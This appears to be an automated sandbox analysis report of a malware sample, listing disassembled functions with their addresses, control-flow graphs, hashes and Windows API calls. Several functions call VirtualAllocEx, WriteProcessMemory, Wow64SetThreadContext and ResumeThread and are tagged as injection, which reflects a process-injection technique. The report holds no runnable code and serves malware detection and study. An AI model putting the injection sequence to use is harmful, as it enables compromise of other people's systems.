                                control_flow_graph 568 124b33b-124b357 569 124b383-124b387 568->569 570 124b359-124b366 call 1249db8 568->570 571 124b389-124b393 569->571 572 124b39b-124b3dc 569->572 575 124b37c 570->575 576 124b368 570->576 571->572 579 124b3de-124b3e6 572->579 580 124b3e9-124b3f7 572->580 575->569 623 124b36e call 124b5e0 576->623 624 124b36e call 124b5d0 576->624 579->580 582 124b3f9-124b3fe 580->582 583 124b41b-124b41d 580->583 581 124b374-124b376 581->575 584 124b4b8-124b578 581->584 586 124b400-124b407 call 124b000 582->586 587 124b409 582->587 585 124b420-124b427 583->585 618 124b580-124b5ab GetModuleHandleW 584->618 619 124b57a-124b57d 584->619 590 124b434-124b43b 585->590 591 124b429-124b431 585->591 589 124b40b-124b419 586->589 587->589 589->585 593 124b43d-124b445 590->593 594 124b448-124b451 call 124b010 590->594 591->590 593->594 599 124b453-124b45b 594->599 600 124b45e-124b463 594->600 599->600 601 124b465-124b46c 600->601 602 124b481-124b48e 600->602 601->602 604 124b46e-124b47e call 124b020 call 124b030 601->604 609 124b490-124b4ae 602->609 610 124b4b1-124b4b7 602->610 604->602 609->610 620 124b5b4-124b5c8 618->620 621 124b5ad-124b5b3 618->621 619->618 621->620 623->581 624->581
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0124B59E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 02fd2d03e10e2af73ab8cc6f5976fe2acf930fa48d50930424ea14890150f4f5
                                • Instruction ID: 5a37f5bc9712e90bf381559972c9b55fe49ed7756e54cf2ccca67b894993d698
                                • Opcode Fuzzy Hash: 02fd2d03e10e2af73ab8cc6f5976fe2acf930fa48d50930424ea14890150f4f5
                                • Instruction Fuzzy Hash: 30814670A10B468FDB29DF29D4547AABBF1FF88300F048A2ED586DBA50D775E845CB90
                                Function 01245D0C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 625 1245d0c-1245d10 626 1245d12-1245d69 625->626 627 1245d6e-1245dd9 CreateActCtxA 625->627 626->627 629 1245de2-1245e3c 627->629 630 1245ddb-1245de1 627->630 637 1245e3e-1245e41 629->637 638 1245e4b-1245e4f 629->638 630->629 637->638 639 1245e60 638->639 640 1245e51-1245e5d 638->640 641 1245e61 639->641 640->639 641->641
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01245DC9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b206e709ac2393ec9101b9c12b0abc91dd2b61b94ee893ebfd7f21e02279de52
                                • Instruction ID: 469b502310c5284dacd5bac29a0f5852f0961b384894d8e3a539fac99a34a6c1
                                • Opcode Fuzzy Hash: b206e709ac2393ec9101b9c12b0abc91dd2b61b94ee893ebfd7f21e02279de52
                                • Instruction Fuzzy Hash: 8F4102B0D00619CBDB28DFA9C844BDEBBF1BF49704F20806AD548AB255DB756946CF90
                                Function 01244560 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 643 1244560-1245dd9 CreateActCtxA 646 1245de2-1245e3c 643->646 647 1245ddb-1245de1 643->647 654 1245e3e-1245e41 646->654 655 1245e4b-1245e4f 646->655 647->646 654->655 656 1245e60 655->656 657 1245e51-1245e5d 655->657 658 1245e61 656->658 657->656 658->658
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01245DC9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 060626b701e9fa21340120aed7fc052ef9d2edfda0daa29a6a5d979f985a35d6
                                • Instruction ID: 98c985885d67154e5df0f933e54c7887c134d4422749991343b6b9f2050cc125
                                • Opcode Fuzzy Hash: 060626b701e9fa21340120aed7fc052ef9d2edfda0daa29a6a5d979f985a35d6
                                • Instruction Fuzzy Hash: 3041F2B0C10719CBDB28DFA9C844B9EBBF5BF49304F20806AD548AB255DBB56946CF90
                                Function 0777D4E9 Relevance: 1.6, APIs: 1, Instructions: 77injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 777d4e9-777d53e 663 777d540-777d54c 660->663 664 777d54e-777d58d WriteProcessMemory 660->664 663->664 666 777d596-777d5c6 664->666 667 777d58f-777d595 664->667 667->666
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0777D580
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fbb646246c5e4bc61f3a7e64dc62dd9173f153238017e9d4beda48bd006047b9
                                • Instruction ID: badfed09a8d3793a7032f254c8cfb480d149dc57a538083f205142d820d31b72
                                • Opcode Fuzzy Hash: fbb646246c5e4bc61f3a7e64dc62dd9173f153238017e9d4beda48bd006047b9
                                • Instruction Fuzzy Hash: D93116B19003499FCF10DFA9C885BEEBBF5FF48314F108429E959A7250C7799545CBA0
                                Function 0777D4F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 671 777d4f0-777d53e 673 777d540-777d54c 671->673 674 777d54e-777d58d WriteProcessMemory 671->674 673->674 676 777d596-777d5c6 674->676 677 777d58f-777d595 674->677 677->676
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0777D580
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 60c2233603f4a557209c8a785d43f435b30dca9e719cc6b5be231c92ce4fef04
                                • Instruction ID: a56292522576de890cfb0a916a78f8a464ee7405f25ae15e3c374087dc3a796b
                                • Opcode Fuzzy Hash: 60c2233603f4a557209c8a785d43f435b30dca9e719cc6b5be231c92ce4fef04
                                • Instruction Fuzzy Hash: C72119B59003599FCF10DFAAC885BEEBBF5FF48314F508429E959A7240C7789944CBA1
                                Function 0777CF18 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 681 777cf18-777cf6b 684 777cf6d-777cf79 681->684 685 777cf7b-777cfab Wow64SetThreadContext 681->685 684->685 687 777cfb4-777cfe4 685->687 688 777cfad-777cfb3 685->688 688->687
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0777CF9E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: a22d21e6adc370eedbc346c8eaa8446641a91e135d0678df6c170b7309fec5a9
                                • Instruction ID: bcc1c500fc4bbaa4fa9b2ba0d4c3ff28694697c328c7f8159f7660f3f820f844
                                • Opcode Fuzzy Hash: a22d21e6adc370eedbc346c8eaa8446641a91e135d0678df6c170b7309fec5a9
                                • Instruction Fuzzy Hash: 602139B19002098FDB10DFAAC4857EEFFF4EF89354F54842AD559A7240CB78A545CFA1
                                Function 0124D820 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0124D8AF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 497597f49a6f8f88861a58eb06986127bbf44eb393eac2af3519441e003e7493
                                • Instruction ID: 82e109be9733129609d560726a78a91aaa30f3b966e01cc0bbcec1ead82a25d9
                                • Opcode Fuzzy Hash: 497597f49a6f8f88861a58eb06986127bbf44eb393eac2af3519441e003e7493
                                • Instruction Fuzzy Hash: F321C3B59002499FDB10CFAAD984ADEBBF5FB48310F14845AE958A7350D7799940CFA0
                                Function 0777D5DF Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0777D660
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: c98c7c4130048522985333747ac3f7bf926e92eb33a2c1c30057281577861713
                                • Instruction ID: f8a3f86a57f66946205ce8bcc2f0d9688390ca25860be41d6370f8e698159783
                                • Opcode Fuzzy Hash: c98c7c4130048522985333747ac3f7bf926e92eb33a2c1c30057281577861713
                                • Instruction Fuzzy Hash: EE2125B1D002599FCB10DFAAC881AEEFBF5FF48310F10842AE519A7240CB789940CBA1
                                Function 0777D5E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0777D660
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 1c2d22b6fd88ccc167eefe990f82640d9126a3021567b3338047fac3f02d8384
                                • Instruction ID: 9649f1327f03c4fb19910d2ebc3aff335261467d4b5aedb59e29cad5b8c1a9e8
                                • Opcode Fuzzy Hash: 1c2d22b6fd88ccc167eefe990f82640d9126a3021567b3338047fac3f02d8384
                                • Instruction Fuzzy Hash: 6C2125B1D002599FCB10DFAAC881AEEFBF5FF48310F10842AE519A7240C7789940CBA1
                                Function 0777CF20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0777CF9E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 93c846f7eb57f1e4f99b5981897d0467fe81bf0996bb228b0b9d42383877b512
                                • Instruction ID: 0efb4e1bdcdd3322de2aaf20c09e67579b7d6c0eca6403e33c56a6faee49b48b
                                • Opcode Fuzzy Hash: 93c846f7eb57f1e4f99b5981897d0467fe81bf0996bb228b0b9d42383877b512
                                • Instruction Fuzzy Hash: F52135B19002098FDB10DFAAC485BEEFBF4EF89354F14842AD519A7240CB78A945CFA0
                                Function 0124D828 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0124D8AF
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: a89c6e2b363c32cbf05d9d2dcee05a80aab88d68f7574dc1ab0ec2bdb7b53d3d
                                • Instruction ID: bfdd8a08c28f74ea05207c2ee6f8f45db014ea85b69be044127424c5b8160b22
                                • Opcode Fuzzy Hash: a89c6e2b363c32cbf05d9d2dcee05a80aab88d68f7574dc1ab0ec2bdb7b53d3d
                                • Instruction Fuzzy Hash: 3821E4B59002089FDB10CFAAD584AEEBFF8FB48310F14841AE918A3350D378A940CFA0
                                Function 0777D428 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0777D49E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 0b3cce9056e8d266385032ad2a3806c78416969ad2fa43ba08da68410b526c58
                                • Instruction ID: 72ab72a0e91250aee6257720c20e97baa93cd90af182c7a0bffb57acb7f30400
                                • Opcode Fuzzy Hash: 0b3cce9056e8d266385032ad2a3806c78416969ad2fa43ba08da68410b526c58
                                • Instruction Fuzzy Hash: F621BB718043498FCF20DFA9C405BEEBFF5EF89314F248859D558A7240C779A540CBA1
                                Function 0777D430 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0777D49E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 95b3f55060018a1838c2f419a7a182b7b1b65acdb732f75906050b5e92361e44
                                • Instruction ID: 35b91b6a62b40f199a26df16e382b2f322877ae8d988bdf2010381c4e4131e85
                                • Opcode Fuzzy Hash: 95b3f55060018a1838c2f419a7a182b7b1b65acdb732f75906050b5e92361e44
                                • Instruction Fuzzy Hash: 83110AB59002499FCB20DFAAC845BDEBFF5FF88314F148419D519A7250C779A544CFA1
                                Function 0777CE68 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 7f5d0828c417be72f768927ff708db3c9d82b9610cd0f0d03b281db10172406f
                                • Instruction ID: 57473e23f534840ff5cd03c2e611288f2a0820297ae42be9794ec9700a617b93
                                • Opcode Fuzzy Hash: 7f5d0828c417be72f768927ff708db3c9d82b9610cd0f0d03b281db10172406f
                                • Instruction Fuzzy Hash: 471149B18002488FCB20DFAAC4457EEFFF9EF89310F248819D559A7240CB79A940CBA0
                                Function 0E961170 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 0E9611D5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2176379798.000000000E960000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_e960000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 9238df5df4e27e8b3633eb0a264fb44f948a0af664124a78554827370a8dc816
                                • Instruction ID: e7cdc78474514720b79c7e857f91ba613e52ab8ed772579cba4662ee2f3665de
                                • Opcode Fuzzy Hash: 9238df5df4e27e8b3633eb0a264fb44f948a0af664124a78554827370a8dc816
                                • Instruction Fuzzy Hash: 9D1113B58003489FDB10CF9AC545BDEBFF8EB48314F20881AD558A7240C379A944CFA1
                                Function 0777CE70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 18bd1a2e7defaebe9d3f0ca9659fce602c4e7273614e8a88c41f1ac7c0f336ee
                                • Instruction ID: 79789574094429e694f30443c4e42aeda7edacd7e95073c621f011b0ba79dd35
                                • Opcode Fuzzy Hash: 18bd1a2e7defaebe9d3f0ca9659fce602c4e7273614e8a88c41f1ac7c0f336ee
                                • Instruction Fuzzy Hash: 61110AB1D002498FDB20DFAAC4457EEFBF9EF88714F248419D519A7240CB79A944CBA5
                                Function 0124B538 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0124B59E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: ab823a5f75c4808d94557b043d4ad988084949d8bb4e811b12d955a84a6ce1ae
                                • Instruction ID: 3e0ba76367f83e53b9f35c066f1a6d0c04da87a0b60c9c431e437cd99c6eb708
                                • Opcode Fuzzy Hash: ab823a5f75c4808d94557b043d4ad988084949d8bb4e811b12d955a84a6ce1ae
                                • Instruction Fuzzy Hash: 771110B5C102498FDB24CFAAD444BDEFBF4EF88310F14841AD918A7200D379A545CFA1
                                Function 0E961178 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 0E9611D5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2176379798.000000000E960000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_e960000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: b9df3d475fc09b37679bafefa53225e49c39c196a518877d0a7b43c8bbbcc5fa
                                • Instruction ID: f2ea41e564f3331ce56b3f591014cf28dc64294ce5a6225442a876f8792a4c4e
                                • Opcode Fuzzy Hash: b9df3d475fc09b37679bafefa53225e49c39c196a518877d0a7b43c8bbbcc5fa
                                • Instruction Fuzzy Hash: 8F11D0B58003499FDB10DF9AC985BDEBBF8FB48324F10841AE958A7240C379A944CFA5
                                Function 0109D4C4 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137297559.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_109d000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9c51c68abe14878ac0645035e476d7bb89295db0decddd857fc382a4aceef8a
                                • Instruction ID: c5b9716704ee509c6845a04a1f6b3b37f04fcdc4b7657371efb9731e18ec639a
                                • Opcode Fuzzy Hash: a9c51c68abe14878ac0645035e476d7bb89295db0decddd857fc382a4aceef8a
                                • Instruction Fuzzy Hash: 8B216A71540200DFCF05DF58D9D0F2ABFA5FB88318F20C5A9E9490B256C336D406D7A1
                                Function 010AD01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137429865.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_10ad000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a2d19ab2d4a5217ed49da19abd2792fe7e6e955c64d0dbf5505ae514e189389a
                                • Instruction ID: ecbb81084935657d20333f001e249eecddf49ff7ab2f7c6a72de70621b652ac0
                                • Opcode Fuzzy Hash: a2d19ab2d4a5217ed49da19abd2792fe7e6e955c64d0dbf5505ae514e189389a
                                • Instruction Fuzzy Hash: 4E212271684200DFCB15DFA8D980F26BFA5FB88354F60C5ADE98A4B656C33AD407CB61
                                Function 010AD1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137429865.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_10ad000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 908b9da3ec14122ae99c2b06fd6b07fb891351d56636ccb8f6d3f5bdf70d4ea3
                                • Instruction ID: 1bb80e9297bf25fe66fb474991a29e35eeb6608e98be4c861f8ca6052053c94b
                                • Opcode Fuzzy Hash: 908b9da3ec14122ae99c2b06fd6b07fb891351d56636ccb8f6d3f5bdf70d4ea3
                                • Instruction Fuzzy Hash: 32210771504204EFDB05DFD8D5C0F2ABBA5FB94324F60C5ADD9894B656C33AD406CB61
                                Function 010AD006 Relevance: .1, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137429865.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_10ad000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 862f1702802b1c78ca59f15d9a61cce81d11a44b8186675e5d40f3fa5de7590f
                                • Instruction ID: 400cc396603d0699e34582b23b8d1c32fc73202846720b3619a53ace9360e19f
                                • Opcode Fuzzy Hash: 862f1702802b1c78ca59f15d9a61cce81d11a44b8186675e5d40f3fa5de7590f
                                • Instruction Fuzzy Hash: B12183755483809FCB03CF64D994B11BFB1EB46214F28C5DAD8898F6A7C33A9816CB62
                                Function 0109D4BF Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137297559.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_109d000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: 42c48482266092b74f45e4180b1023e32b380d65390c233c71c18363084413cb
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: F111DF76444280CFCF02CF54D5C4B16BFB1FB88314F24C6A9D9490B256C336D45ADBA2
                                Function 010AD1CF Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137429865.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_10ad000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: 4b6e0ff82f3c803fbded00f159c8c73bae3ecce4f739931029f3b46b235afe92
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: FA11BB75504280DFDB02CF94C5C4B15BFA1FB84224F24C6A9D8894B6A6C33AD40ACB62

                                Execution Graph

                                Execution Coverage:7.4%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 21509 8e36490 21510 8e36498 SetThreadToken 21509->21510 21512 8e36501 21510->21512

                                Executed Functions

                                Function 04E5B490 Relevance: .3, Instructions: 258COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 904 4e5b490-4e5b4b9 905 4e5b4be-4e5b7f9 call 4e5aab4 904->905 906 4e5b4bb 904->906 967 4e5b7fe-4e5b805 905->967 906->905
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c47232d7ca5d6b92dd98139fc1055b3b4d5a3ef1e65ecfd10d6bc535eabb672
                                • Instruction ID: 1a5dcbd838a9236c167e8a899d1c446f7c0ac9acffd7e0b7a171619113797bf3
                                • Opcode Fuzzy Hash: 6c47232d7ca5d6b92dd98139fc1055b3b4d5a3ef1e65ecfd10d6bc535eabb672
                                • Instruction Fuzzy Hash: A491A374B007149BEF19EFB484115AEB7E2EF84604B10C92ED59AAB350DF34AD06CBD6
                                Function 04E5B4A0 Relevance: .3, Instructions: 252COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 968 4e5b4a0-4e5b4b9 969 4e5b4be-4e5b7f9 call 4e5aab4 968->969 970 4e5b4bb 968->970 1031 4e5b7fe-4e5b805 969->1031 970->969
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fe3e32f7a0577e5bbb664a4bfd761b5bb9ad9ed27b4911b134a2f03245ace1e
                                • Instruction ID: 0447440dcd6a1a51e78c960f7620c8d1807cfcf1bfdc23471a33a337e5e33006
                                • Opcode Fuzzy Hash: 2fe3e32f7a0577e5bbb664a4bfd761b5bb9ad9ed27b4911b134a2f03245ace1e
                                • Instruction Fuzzy Hash: B491B274B007149BEF19EFB484115AEB7E6EF84604B10C92ED58AAB350DF34AD06CBD6
                                Function 07CC2308 Relevance: 10.6, Strings: 8, Instructions: 648COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$pij$pij$pij$pij$pij$|,j
                                • API String ID: 0-1921836591
                                • Opcode ID: 9b8c9ab48bffaa6682c4e2ccd89263f51c097969afaa605882b9270947e3664d
                                • Instruction ID: 72625c05a7be90fb21034ddc8215430e97fdede8b794e36d9c1e3d701951feac
                                • Opcode Fuzzy Hash: 9b8c9ab48bffaa6682c4e2ccd89263f51c097969afaa605882b9270947e3664d
                                • Instruction Fuzzy Hash: 912246B1B00306DFCB25DB69C4816AABBE6FF85210F1480BEE945DF251CB35D945CBA2
                                Function 07CC3CE8 Relevance: 5.6, Strings: 4, Instructions: 595COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
